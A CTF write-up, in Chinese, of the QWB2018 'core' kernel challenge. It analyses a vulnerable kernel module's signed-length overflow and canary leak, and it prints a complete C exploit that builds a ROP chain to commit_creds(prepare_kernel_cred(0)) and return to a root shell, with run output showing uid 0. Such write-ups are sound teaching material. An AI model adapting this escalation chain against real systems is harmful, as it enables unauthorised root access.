[kernel pwn] QWB2018-core

前面做了一道kernel-uaf的题,接着复现一下kernel-rop的题目

环境分析

  • 首先按照kernel pwn的套路,先解压core.cpio文件,查看init文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0 -f
  • 从脚本中可以看到有我们需要分析的模块文件是core.ko,然后还有条定时关机的命令(poweroff -d 120 -f &),为了不影响我们调试,所以把这条命令删掉再重打包,/tmp目录下有一个符号文件kallsyms,可以leak出内核信息,找到commit_credsprepare_kernel_cred的地址
1
./gen_cpio.sh core.cpio
  • 启动时候发现有报错,是因为分配的内存过小,将start.sh 中-m分配的64M修改为128M即可
1
Kernel panic - not syncing: Out of memory and no killable processes...

模块分析

  • 首先看开了什么保护
1
2
3
4
5
6
7
☁  give_to_player  checksec core.ko 
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/core.ko'
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x0)
  • 然后ida分析,core_copy_func函数的参数是signed int64而qmemcpy的函数是unsigned int16,当传入参数a1为负数会产生溢出,将我们的rop链拷贝到栈上
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
signed __int64 __fastcall core_copy_func(signed __int64 a1)
{
signed __int64 result; // rax
__int64 v2; // [rsp+0h] [rbp-50h]
unsigned __int64 v3; // [rsp+40h] [rbp-10h]

v3 = __readgsqword(0x28u);
printk(&unk_215);
if ( a1 > 63 )
{
printk(&unk_2A1);
result = 0xFFFFFFFFLL;
}
else
{
result = 0LL;
qmemcpy(&v2, &name, (unsigned __int16)a1);
}
return result;
}
  • core_ioctl函数可以控制全局变量off,而core_read会根据off的偏移来拷贝 64 个字节到用户空间,我们可以控制off来leak canary和一些地址
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
__int64 __fastcall core_ioctl(__int64 a1, int a2, __int64 a3)
{
signed __int64 v3; // rbx

v3 = a3;
switch ( a2 )
{
case 1719109787:
core_read(a3);
break;
case 1719109788:
printk(&unk_2CD);
off = v3;
break;
case 1719109786:
printk(&unk_2B3);
core_copy_func(v3);
break;
}
return 0LL;
}

unsigned __int64 __fastcall core_read(__int64 a1)
{
__int64 v1; // rbx
__int64 *v2; // rdi
signed __int64 i; // rcx
unsigned __int64 result; // rax
__int64 v5; // [rsp+0h] [rbp-50h]
unsigned __int64 v6; // [rsp+40h] [rbp-10h]

v1 = a1;
v6 = __readgsqword(0x28u);
printk(&unk_25B);
printk(&unk_275);
v2 = &v5;
for ( i = 16LL; i; --i )
{
*(_DWORD *)v2 = 0;
v2 = (__int64 *)((char *)v2 + 4);
}
strcpy((char *)&v5, "Welcome to the QWB CTF challenge.\n");
result = copy_to_user(v1, (char *)&v5 + off, 64LL);
if ( !result )
return __readgsqword(0x28u) ^ v6;
__asm { swapgs }
return result;
}
  • core_write让我们对name进行写入,通过core_write和core_copy_func函数实现写入rop_chain
1
2
3
4
5
6
7
8
9
10
11
signed __int64 __fastcall core_write(__int64 a1, __int64 a2, unsigned __int64 a3)
{
unsigned __int64 v3; // rbx

v3 = a3;
printk(&unk_215);
if ( v3 <= 0x800 && !copy_from_user(&name, a2, v3) )
return (unsigned int)v3;
printk(&unk_230);
return 4294967282LL;
}

利用思路

  1. 通过 ioctl 设置 off,然后通过 core_read() leak 出 canary
  2. 通过 core_write() 向 name 写,构造 ropchain
  3. 通过 core_copy_func() 从 name 向局部变量上写,通过设置合理的长度和 canary 进行 rop
  4. 通过 rop 执行 commit_creds(prepare_kernel_cred(0))
  5. 返回用户态,通过 system(“/bin/sh”) 等起 shell

编写exp

  1. 编写exp的时候还要边调试,下图是调试寻找泄漏canary的偏移,由图可知道canary距离rsp的偏移是0x40,返回地址的偏移是0x50

  1. 接下来是找覆盖返回地址的偏移,由图可知返回地址偏移是0x50

  1. 找gadget的偏移,不能从带符号的vmlinux里面找gadget,要从bzImage里面提取之后再找gadget,先用extract-vmlinux提取文件出来,再用ropper找gadegt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
☁  give_to_player  ./extract-vmlinux ./bzImage > rop_gadget
☁ give_to_player ropper --file './rop_gadget' --search "pop rdx; ret"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdx; ret

[INFO] File: ./rop_gadget
0xffffffff81f1023d: pop rdx; ret 0x6fff;
0xffffffff817f8da2: pop rdx; ret 0xa0;
0xffffffff817023a4: pop rdx; ret 0xebff;
0xffffffff810a0f49: pop rdx; ret;

☁ give_to_player bpython
bpython version 0.17.1 on top of Python 2.7.12 /usr/bin/python
>>> from pwn import *
>>> vmlinux = ELF("./rop_gadget")
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/rop_ga
dget'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0xffffffff81000000)
RWX: Has RWX segments
>>> pop_rdx_ret_offset = hex(0xffffffff810a0f49 - 0xffffffff81000000)
>>> pop_rdx_ret_offset
'0xa0f49'
  1. 写exp,这里直接套用charlie师傅的exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
//gcc exp.c -o exp -static -masm=intel
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <string.h>


size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}

void binsh()
{
system("/bin/sh");
}

int main()
{
save_status();
void* commit_creds;
void* base_addr;
void* prepare_kernel_cred;

FILE* base=popen("grep startup_64 /tmp/kallsyms |awk -F' ' '{print $1}'","r");
fscanf(base,"%p",&base_addr);
commit_creds=base_addr+0x9c8e0;
prepare_kernel_cred=base_addr+0x9cce0;

printf("commit_creds is %p \nbase is %p \nprepare is %p\n",commit_creds,base_addr,prepare_kernel_cred);

fclose(base);

int fd = open("/proc/core",O_WRONLY);

if(fd<0)
{
printf("open core failed\n");
exit(-1);
}

ioctl(fd,0x6677889C,0x40); //set offset
long long canary[0x10];
ioctl(fd,0x6677889B,canary); //get canary
printf("ret addr is %lx\n",canary[2]);
long long payload[0x40];


payload[8]=canary[0]; //canary
payload[9]=canary[1]; //rbp

void* mov_rdi_rax_jmp_rdx=base_addr+0x6a6d2;
void* prdx=base_addr+0xa0f49;
void* prdi=base_addr+0xb2f;
void* swapgs=base_addr+0xa012da;
void* iretq=base_addr+0x50ac2;

int i=10;
payload[i++]=prdi; //pop rdi;
payload[i++]=0;
payload[i++]=prepare_kernel_cred; //prepare_kernel_cred(0);
payload[i++]=prdx; //pop rdx;
payload[i++]=commit_creds; //commit_creds(prepare_kernel_cred(0));
payload[i++]=mov_rdi_rax_jmp_rdx; //mov rdi, rax; call rdx;
payload[i++]=swapgs; //swapgs; popfq; ret
payload[i++]=0;
payload[i++]=iretq; //iretq; ret;
payload[i++]=(size_t)binsh;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_sp;
payload[i++] = user_ss;

write(fd,payload,0x200);
long long v=0xffffffffffff0000 | (0x100);
ioctl(fd,0x6677889A,v);
return 0;
}
  1. 编译exp,然后重打包fs,启动系统,运行exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
☁  give_to_player  gcc exp.c -o exp -static -masm=intel
☁ give_to_player cd core
☁ core ./gen_cpio.sh core.cpio
☁ core cp ./core.cpio ../
☁ core cd ..
☁ give_to_player ./start.sh
/ $ ./exp
[*]status has been saved.
commit_creds is 0xffffffffbd29c8e0
base is 0xffffffffbd200000
prepare is 0xffffffffbd29cce0
ret addr is ffffffffc039119b
/ # id
uid=0(root) gid=0(root)
/ #

参考文章: